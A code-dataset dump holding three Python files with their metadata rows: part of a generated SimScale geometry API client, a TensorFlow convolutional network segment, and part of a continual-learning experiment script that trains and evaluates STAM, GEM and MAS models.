>>> thread = api.get_geometries(project_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str project_id: The project ID (required)
:param int limit: The number of items to return.
:param int page: The page number. Use in combination with limit.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Geometries
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_geometries_with_http_info(project_id, **kwargs) # noqa: E501
def get_geometries_with_http_info(self, project_id, **kwargs): # noqa: E501
"""List geometries within a project # noqa: E501
Only valid geometries that can be used for a simulation setup are included. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_geometries_with_http_info(project_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str project_id: The project ID (required)
:param int limit: The number of items to return.
:param int page: The page number. Use in combination with limit.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Geometries, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'project_id',
'limit',
'page'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_geometries" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'project_id' is set
if self.api_client.client_side_validation and ('project_id' not in local_var_params or # noqa: E501
local_var_params['project_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `project_id` when calling `get_geometries`") # noqa: E501
if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] > 1000: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `get_geometries`, must be a value less than or equal to `1000`") # noqa: E501
if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] < 10: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `get_geometries`, must be a value greater than or equal to `10`") # noqa: E501
if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] > 1000: # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `get_geometries`, must be a value less than or equal to `1000`") # noqa: E501
if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `get_geometries`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in local_var_params:
path_params['projectId'] = local_var_params['project_id'] # noqa: E501
query_params = []
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey'] # noqa: E501
return self.api_client.call_api(
'/projects/{projectId}/geometries', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Geometries', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_geometry(self, project_id, geometry_id, **kwargs): # noqa: E501
"""Get information about the geometry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_geometry(project_id, geometry_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str project_id: The project ID (required)
:param str geometry_id: The geometry ID (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Geometry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_geometry_with_http_info(project_id, geometry_id, **kwargs) # noqa: E501
def get_geometry_with_http_info(self, project_id, geometry_id, **kwargs): # noqa: E501
"""Get information about the geometry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_geometry_with_http_info(project_id, geometry_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str project_id: The project ID (required)
:param str geometry_id: The geometry ID (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Geometry, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'project_id',
'geometry_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_geometry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'project_id' is set
if self.api_client.client_side_validation and ('project_id' not in local_var_params or # noqa: E501
local_var_params['project_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `project_id` when calling `get_geometry`") # noqa: E501
# verify the required parameter 'geometry_id' is set
if self.api_client.client_side_validation and ('geometry_id' not in local_var_params or # noqa: E501
local_var_params['geometry_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `geometry_id` when calling `get_geometry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in local_var_params:
path_params['projectId'] = local_var_params['project_id'] # noqa: E501
if 'geometry_id' in local_var_params:
path_params['geometryId'] = local_var_params['geometry_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey'] # noqa: E501
return self.api_client.call_api(
'/projects/{projectId}/geometries/{geometryId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Geometry', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_geometry_mappings(self, project_id, geometry_id, **kwargs): # noqa: E501
"""Describe id mapping of the geometry # noqa: E501
Assignment of topological entities (faces, bodies) in the simulation setup is a non-trivial task. Complex models can consist of several assemblies which may contain multiple occurrences of bodies and their entities. In order to describe an assignment unambiguously the full path from the root part of the model to the actual topological entity is required. SimScale generates unique internal names for all topological entities of a model during the geometry import which are used for assignments within the simulation spec. Examples of internal names are `B1_TE5` or `A1_I26_A5_I27_B102_TE196`. This API endpoint allows to retrieve a mapping between the internal names and a detailed description of the entities which includes: * The topological entity class (body or face) * The original body and entity names * Entity attributes like `SDL/TYSA_NAME` or `SDL/TYSA_COLOUR` * The path from the root of the model Please note that during geometry import the model's topology can be modified (e.g. facet split and other import options) which means that there is no 1:1 mapping between the internal and original names. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_geometry_mappings(project_id, geometry_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str project_id: The project ID (required)
:param str geometry_id: The geometry ID (required)
:param int limit: The number of items to return.
:param int page: The page number. Use in combination with limit.
:param str _class: The entity class to filter.
:param list[str] bodies: The body names to filter. If multiple body names are provided any match.
:param list[str] entities: The entity names to filter. If multiple entity names are provided any match.
:param list[str] attributes: The attribute names to filter. If multiple attribute names are provided any match.
:param list[str] values: The attribute values to filter. If multiple attribute values are provided any match.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: GeometryMappings
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_geometry_mappings_with_http_info(project_id, geometry_id, **kwargs) # noqa: E501
def get_geometry_mappings_with_http_info(self, project_id, geometry_id, **kwargs): # noqa: E501
"""Describe id mapping of the geometry # noqa: E501
Assignment of topological entities (faces, bodies) in the simulation setup is a non-trivial task. Complex models can consist of several assemblies which may contain multiple occurrences of bodies and their entities. In order to describe an assignment unambiguously the full path from the root part of the model to the actual topological entity is required. SimScale generates unique internal names for all topological entities of a model during the geometry import which are used for assignments within the simulation spec. Examples of internal names are `B1_TE5` or `A1_I26_A5_I27_B102_TE196`. This API endpoint allows to retrieve a mapping between the internal names and a detailed description of the entities which includes: * The topological entity class (body or face) * The original body and entity names * Entity attributes like `SDL/TYSA_NAME` or `SDL/TYSA_COLOUR` * The path from the root of the model Please note that during geometry import the model's topology can be modified (e.g. facet split and other import options) which means that there is no 1:1 mapping between the internal and original names. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_geometry_mappings_with_http_info(project_id, geometry_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str project_id: The project ID (required)
:param str geometry_id: The geometry ID (required)
:param int limit: The number of items to return.
:param int page: The page number. Use in combination with limit.
:param str _class: The entity class to filter.
:param list[str] bodies: The body names to filter. If multiple body names are provided any match.
:param list[str] entities: The entity names to filter. If multiple entity names are provided any match.
:param list[str] attributes: The attribute names to filter. If multiple attribute names are provided any match.
:param list[str] values: The attribute values to filter. If multiple attribute values are provided any match.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GeometryMappings, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'project_id',
'geometry_id',
'limit',
'page',
'_class',
'bodies',
'entities',
'attributes',
'values'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_geometry_mappings" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'project_id' is set
if self.api_client.client_side_validation and ('project_id' not in local_var_params or # noqa: E501
local_var_params['project_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `project_id` when calling `get_geometry_mappings`") # noqa: E501
# verify the required parameter 'geometry_id' is set
if self.api_client.client_side_validation and ('geometry_id' not in local_var_params or # noqa: E501
local_var_params['geometry_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `geometry_id` when calling `get_geometry_mappings`") # noqa: E501
if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] > 1000: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `get_geometry_mappings`, must be a value less than or equal to `1000`") # noqa: E501
if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] < 10: # noqa: E501
raise ApiValueError("Invalid value for parameter `limit` when calling `get_geometry_mappings`, must be a value greater than or equal to `10`") # noqa: E501
if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] > 1000: # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `get_geometry_mappings`, must be a value less than or equal to `1000`") # noqa: E501
if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `get_geometry_mappings`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in local_var_params:
path_params['projectId'] = local_var_params['project_id'] # noqa: E501
if 'geometry_id' in local_var_params:
path_params['geometryId'] = local_var_params['geometry_id'] # noqa: E501
query_params = []
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if '_class' in local_var_params and local_var_params['_class'] is not None: # noqa: E501
query_params.append(('class', local_var_params['_class'])) # noqa: E501
if 'bodies' in local_var_params and local_var_params['bodies'] is not None: # noqa: E501
query_params.append(('bodies', local_var_params['bodies'])) # noqa: E501
collection_formats['bodies'] = 'multi' # noqa: E501
if 'entities' in local_var_params and local_var_params['entities'] is not None: # noqa: E501
query_params.append(('entities', local_var_params['entities'])) # noqa: E501
collection_formats['entities'] = 'multi' # noqa: E501
if 'attributes' in local_var_params and local_var_params['attributes'] is not None: # noqa: E501
query_params.append(('attributes', local_var_params['attributes'])) # noqa: E501
collection_formats['attributes'] = 'multi' # noqa: E501
if 'values' in local_var_params and local_var_params['values'] is not None: # noqa: E501
query_params.append(('values', local_var_params['values'])) # noqa: E501
collection_formats['values'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey'] # noqa: E501
return self.api_client.call_api(
'/projects/{projectId}/geometries/{geometryId}/mappings', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GeometryMappings', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_geometry(self, project_id, geometry_id, geometry, **kwargs): # noqa: E501
"""Update geometry information # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_geometry(project_id, geometry_id, geometry, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str project_id: The project ID (required)
:param str geometry_id: The geometry ID (required)
:param Geometry geometry: Geometry information to be updated (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_geometry_with_http_info(project_id, geometry_id, geometry, **kwargs) # noqa: E501
def update_geometry_with_http_info(self, project_id, geometry_id, geometry, **kwargs): # noqa: E501
"""Update geometry information # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_geometry_with_http_info(project_id, geometry_id, geometry, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str project_id: The project ID (required)
:param str geometry_id: The geometry ID (required)
:param Geometry geometry: Geometry information to be updated (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'project_id',
'geometry_id',
'geometry'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_geometry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'project_id' is set
if self.api_client.client_side_validation and ('project_id' not in local_var_params or # noqa: E501
local_var_params['project_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `project_id` when calling `update_geometry`") # noqa: E501
# verify the required parameter 'geometry_id' is set
if self.api_client.client_side_validation and ('geometry_id' not in local_var_params or # noqa: E501
local_var_params['geometry_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `geometry_id` when calling `update_geometry`") # noqa: E501
# verify the required parameter 'geometry' is set
if self.api_client.client_side_validation and ('geometry' not in local_var_params or # noqa: E501
local_var_params['geometry'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `geometry` when calling `update_geometry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in local_var_params:
path_params['projectId'] = local_var_params['project_id'] # noqa: E501
if 'geometry_id' in local_var_params:
path_params['geometryId'] = local_var_params['geometry_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'geometry' in local_var_params:
body_params = local_var_params['geometry']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey'] # noqa: E501
return self.api_client.call_api(
'/projects/{projectId}/geometries/{geometryId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 54.320405
| 1,139
| 0.627282
| 3,879
| 32,212
| 4.993555
| 0.072441
| 0.047496
| 0.077336
| 0.027259
| 0.935519
| 0.932989
| 0.929633
| 0.927414
| 0.90857
| 0.907537
| 0
| 0.01902
| 0.299795
| 32,212
| 592
| 1,140
| 54.412162
| 0.839769
| 0.445424
| 0
| 0.665563
| 1
| 0.02649
| 0.223643
| 0.037069
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029801
| false
| 0
| 0.016556
| 0
| 0.076159
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d8d96d08297ae19f982bb7afb1f29aaf61d1cb8d
| 1,872
|
py
|
Python
|
python/models/fast_conv_segment.py
|
xiaotaox5/shahrukhqasim6
|
4595878d749808b3da0b5210984a5d4905b05042
|
[
"MIT"
] | 256
|
2019-05-30T04:44:01.000Z
|
2022-03-30T15:02:15.000Z
|
python/models/fast_conv_segment.py
|
xiaotaox5/shahrukhqasim6
|
4595878d749808b3da0b5210984a5d4905b05042
|
[
"MIT"
] | 49
|
2019-06-16T16:16:24.000Z
|
2022-03-03T10:12:24.000Z
|
python/models/fast_conv_segment.py
|
xiaotaox5/shahrukhqasim6
|
4595878d749808b3da0b5210984a5d4905b05042
|
[
"MIT"
] | 74
|
2019-05-07T16:40:51.000Z
|
2022-02-14T21:56:59.000Z
|
from models.network_segment_interface import NetworkSegmentInterface
import tensorflow as tf
class FastConvSegment(NetworkSegmentInterface):
def build_network_segment(self, inputs):
graph = inputs
graph = tf.image.resize_images(graph, size=(256,256))
# graph = tf.layers.conv2d(graph, filters=3, kernel_size=3, strides=3, padding='same', activation=None)
graph = tf.layers.conv2d(graph, filters=16, kernel_size=3, activation=tf.nn.leaky_relu)
graph = tf.layers.conv2d(graph, filters=16, kernel_size=3, activation=tf.nn.leaky_relu)
graph = tf.layers.conv2d(graph, filters=32, kernel_size=3, activation=tf.nn.leaky_relu)
graph = tf.layers.conv2d(graph, filters=32, kernel_size=2, strides=2, padding='same', activation=None)
graph = tf.layers.conv2d(graph, filters=32, kernel_size=3, activation=tf.nn.leaky_relu)
graph = tf.layers.conv2d(graph, filters=32, kernel_size=3, activation=tf.nn.leaky_relu)
graph = tf.layers.conv2d(graph, filters=32, kernel_size=3, activation=tf.nn.leaky_relu)
graph = tf.layers.conv2d(graph, filters=32, kernel_size=3, activation=tf.nn.leaky_relu)
graph = tf.layers.conv2d(graph, filters=32, kernel_size=2, padding='same', activation=None)
graph = tf.layers.conv2d(graph, filters=48, kernel_size=3, activation=tf.nn.leaky_relu)
graph = tf.layers.conv2d(graph, filters=48, kernel_size=3, activation=tf.nn.leaky_relu)
graph = tf.layers.conv2d(graph, filters=48, kernel_size=3, activation=tf.nn.leaky_relu)
graph = tf.layers.conv2d(graph, filters=48, kernel_size=3, activation=tf.nn.leaky_relu)
graph = tf.layers.conv2d(graph, filters=128, kernel_size=1, activation=tf.nn.leaky_relu)
graph = tf.layers.conv2d(graph, filters=128, kernel_size=1, activation=tf.nn.leaky_relu)
return graph
| 60.387097
| 111
| 0.719551
| 274
| 1,872
| 4.791971
| 0.153285
| 0.090632
| 0.158416
| 0.231531
| 0.813404
| 0.813404
| 0.789794
| 0.789794
| 0.789794
| 0.789794
| 0
| 0.046057
| 0.153312
| 1,872
| 30
| 112
| 62.4
| 0.782334
| 0.053953
| 0
| 0.590909
| 0
| 0
| 0.004522
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.090909
| 0
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8da8a664b0fba0b673b69bf4a1bff539b52dc2d
| 23,083
|
py
|
Python
|
main.py
|
CameronTaylorFL/stam
|
6167ae6a3388e256778fca7bf0b2b61b9c146b48
|
[
"MIT"
] | 3
|
2021-05-10T20:41:09.000Z
|
2021-11-24T18:47:58.000Z
|
main.py
|
CameronTaylorFL/stam
|
6167ae6a3388e256778fca7bf0b2b61b9c146b48
|
[
"MIT"
] | null | null | null |
main.py
|
CameronTaylorFL/stam
|
6167ae6a3388e256778fca7bf0b2b61b9c146b48
|
[
"MIT"
] | 1
|
2021-05-14T14:21:16.000Z
|
2021-05-14T14:21:16.000Z
|
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import yaml
import pickle
import signal
import time
from options import TrainParser
from core.models.stam_wrapper import StamWrapper
from core.models.gem_wrapper import GEMWrapper
from core.models.mas_wrapper import MASWrapper
from core.utils import *
from core.dataset import *
from core.config import *
from core.data_sampling import *
from core.distance_metrics import *
from core.checkpoints import *
#from plots import *
def run_train(results, trial, args, configs):
# reset random seed
np.random.seed(trial)
configs['seed'] = trial
print('**************************************************')
print('TRIAL ', str(trial+1))
print('**************************************************')
# Trial Params
num_classes = configs['num_classes']
num_phases = configs['num_phases']
# Datastream
datastream = stream['datastream']
tasks_set = stream['tasks_set']
# Extra Experimental Params
train_params = configs['train_params']
if args.model_name == 'stam':
configs = load_stam_configs(args)
if args.model_name == 'gem':
configs = load_gem_configs(args)
if args.model_name == 'mas':
configs = load_mas_configs(args)
#if not args.experiment:
x_train, y_train, x_test, y_test = sample_datastream(x_, x_eval, y_, y_eval,
datastream, num_classes,
num_phases, args)
if args.vis:
model.pick_sample_images(x_test[0][0], y_test[0][0])
# for each incremental phase
for phase in range(num_phases):
class_tasks = tasks_set[phase]
# train from unlabeled data
print('Phase ' + str(phase+1) + ':')
print('Learning from data stream...')
print('Class Distribution {}'.format(np.bincount(y_train[phase], minlength=num_classes)))
model.train(x_train[phase], y_train[phase], phase+1, train_params)
save_checkpoint(None, model, trial, phase, args.log, args.dataset)
def run_test(log, trial, results, args, configs):
# reset random seed
np.random.seed(trial)
configs['seed'] = trial
print('**************************************************')
print('TRIAL ', str(trial+1))
print('**************************************************')
# Trial Params
num_classes = configs['num_classes']
num_phases = configs['num_phases']
# Accuracy Models
classifiers = configs['classifiers']
clustering_models = configs['clustering_models']
# Datastream
datastream = stream['datastream']
stream_name = stream['stream_name']
tasks_string = stream['tasks_string']
tasks_set = stream['tasks_set']
# Extra Experimental Params
supervise_params = configs['supervise_params']
classify_params = configs['classify_params']
cluster_params = configs['cluster_params']
_, _, x_test, y_test = sample_datastream(x_, x_eval, y_, y_eval,
datastream, num_classes,
num_phases, args)
l_eval = configs['l_eval']
# for each incremental phase
for phase in range(args.start_phase-1, num_phases):
class_tasks = tasks_set[phase]
# train from unlabeled data
print('Phase ' + str(phase+1) + ':')
_, model = load_checkpoint(trial, phase, args.load_log, args.dataset, test=True)
model.plot_directory = configs['plot_directory']
model.vis_cluster = configs['visualize_cluster']
model.vis_train = configs['visualize_train']
# do not always have task to evaluate
if len(class_tasks) > 0:
# reset stored classification info
model.setTask(args.ntp, len(np.unique(class_tasks[0])))
# for num_tasks time (number tasks per phase)
for sample in range(args.ntp):
# Show eval sample number
print(' Sample ' + str(sample+1) + '/' + str(args.ntp))
# labeled data (supervision)
x_supervise = x_test[sample][1]
y_supervise = y_test[sample][1]
# querry data (evaluation)
x_query = x_test[sample][0]
y_query = y_test[sample][0]
# for all tasks
for ti, task in enumerate(class_tasks):
# get tasks (i.e. classes for classification task)
t_string = tasks_string[ti]
# get task labeled data and eval data
x_query_t = x_query[np.isin(y_query, task)]
y_query_t = y_query[np.isin(y_query, task)].astype(int)
x_supervise_t = x_supervise[np.isin(y_supervise, task)]
y_supervise_t = y_supervise[np.isin(y_supervise, task)].astype(int)
print('Task: ' + str(task))
print('Total Labeled Examples Per Class ' + str(np.bincount(y_supervise_t, minlength=num_classes)))
print('Total Test Examples Per Class ' + str(np.bincount(y_query_t, minlength=num_classes)))
# supervision
print(' Showing supervision...')
model.supervise(x_supervise_t, y_supervise_t, phase,
supervise_params, l_list=l_eval, index=sample)
# Percent of class informative centroids
if args.model_name == 'stam':
ci_score, ci_score_pc, multi_ci = model.get_ci(phase, sample, args.vis)
results['class_informative'][trial, sample, phase, ti, :] = ci_score
results['class_informative_pc'][trial, sample, phase, ti, :, :] = ci_score_pc
results['class_informative_multi'][trial, sample, phase, ti, :] = multi_ci
if args.vis and args.model_name == 'stam':
model.detailed_classification_plots()
# classification and evalution
print(' Eval Task: ' + t_string)
print(' Classifying...')
confusion_matrices = np.zeros((len(classifiers), num_classes, num_classes))
for ci, classifier in enumerate(classifiers):
# Weakly supervised predictions
y_predict = model.classify(x_query_t, phase, classifier,
sample, classify_params).astype(int)
# Calculate Confusion Matrix for Predictions
if args.vis and sample == 0:
for cf in range(len(y_predict)):
confusion_matrices[ci, int(y_query_t[cf]), int(y_predict[cf])] += 1
plt.imshow(confusion_matrices[0], cmap='hot', interpolation='nearest')
plt.ylabel("True Class")
plt.xlabel("Predicted Class")
plt.xticks(np.arange(num_classes))
plt.yticks(np.arange(num_classes))
for i in range(num_classes):
for j in range(num_classes):
text = plt.text(j, i, confusion_matrices[0, i, j], ha="center", va="center", color="w")
plt.savefig(smart_dir(model.plot_directory + '/phase_{}/'.format(phase)) + 'confusion_matrix.png')
plt.close()
# all class results
score = 100 * np.mean(y_query_t == y_predict)
print(' ' + classifier + ': ' \
+ str(score) + '%')
if args.model_name == 'stam':
print(' ' + classifier + ': ' \
+ str(ci_score), ' % class informative')
print(' ' + classifier + ': ' \
+ str(multi_ci), ' % class informative - more than 1')
# per class results
score_pc = [100 * np.mean(y_query_t[np.where(y_query_t == k)] \
== y_predict[np.where(y_query_t == k)]) for k in task]
results['classification_accuracy'][trial, sample, phase, ti, ci] = score
results['classification_accuracy_pc'][trial, sample, phase, ti, ci, :len(task)] = score_pc
for ci, cluster_method in enumerate(clustering_models):
acc, pc_acc = model.cluster(x_query_t, y_query_t, phase,
sample, args.dataset, num_classes,
cluster_params[ci],
cluster_method, eval_layers=l_eval)
print(' ' + cluster_method + ': ' \
+ str(acc) + '%')
print(ti, ci)
results['clustering_acc'][trial, sample, phase, ti, ci] = acc
results['clustering_acc_pc'][trial, sample, phase, ti, ci, :] = pc_acc
if args.model_name == 'stam':
results['ltm_growth'] = [model.layers[0].ltm_history, model.layers[1].ltm_history, model.layers[2].ltm_history]
return results
def run_trial(trial, results, args, configs):
# reset random seed
np.random.seed(trial)
configs['seed'] = trial
# Trial Params
num_classes = configs['num_classes']
num_phases = configs['num_phases']
# Accuracy Models
classifiers = configs['classifiers']
clustering_models = configs['clustering_models']
# Datastream
datastream = stream['datastream']
stream_name = stream['stream_name']
tasks_string = stream['tasks_string']
tasks_set = stream['tasks_set']
# Extra Experimental Params
train_params = configs['train_params']
supervise_params = configs['supervise_params']
classify_params = configs['classify_params']
cluster_params = configs['cluster_params']
# print trial number
print('**************************************************')
print('TRIAL ', str(trial+1))
print('**************************************************')
if args.model_name == 'stam':
model = StamWrapper(configs)
if args.model_name == 'gem':
model = GEMWrapper(configs)
if args.model_name == 'mas':
model = MASWrapper(configs)
x_train, y_train, x_test, y_test = sample_datastream(x_, x_eval, y_, y_eval,
datastream, num_classes,
num_phases, args)
l_eval = configs['l_eval']
